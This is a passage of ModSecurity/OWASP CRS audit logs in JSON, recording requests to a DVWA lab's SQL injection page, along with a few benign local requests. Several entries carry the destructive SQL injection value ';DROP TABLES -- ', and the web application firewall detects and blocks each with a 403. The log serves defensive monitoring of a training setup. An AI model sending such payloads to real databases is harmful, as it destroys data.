Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":539,"p2":2986,"p3":0,"p4":0,"p5":250,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:49 --0400","transaction_id":"WRc21X8AAQEAAAmHBJ8AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":587,"p2":3290,"p3":0,"p4":0,"p5":219,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:50 --0400","transaction_id":"WRc21n8AAQEAAAmHBKAAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":521,"p2":2383,"p3":0,"p4":0,"p5":146,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:52 --0400","transaction_id":"WRc22H8AAQEAAAmHBKEAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=93","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":414,"p2":2600,"p3":0,"p4":0,"p5":174,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc24n8AAQEAAAkW4SAAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:38:35 GMT","If-None-Match":"\"26d-54f6a7404e88e\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:40:00 GMT","ETag":"\"294-54f6a791bc669\"","Accept-Ranges":"bytes","Content-Length":"660","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc24n8AAQEAAAkW4SAAAAAB\"]"],"stopwatch":{"p1":433,"p2":1168,"p3":58,"p4":171,"p5":52,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc2438AAQEAAAkW4SEAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2438AAQEAAAkW4SEAAAAB\"]"],"stopwatch":{"p1":384,"p2":892,"p3":43,"p4":362,"p5":49,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for 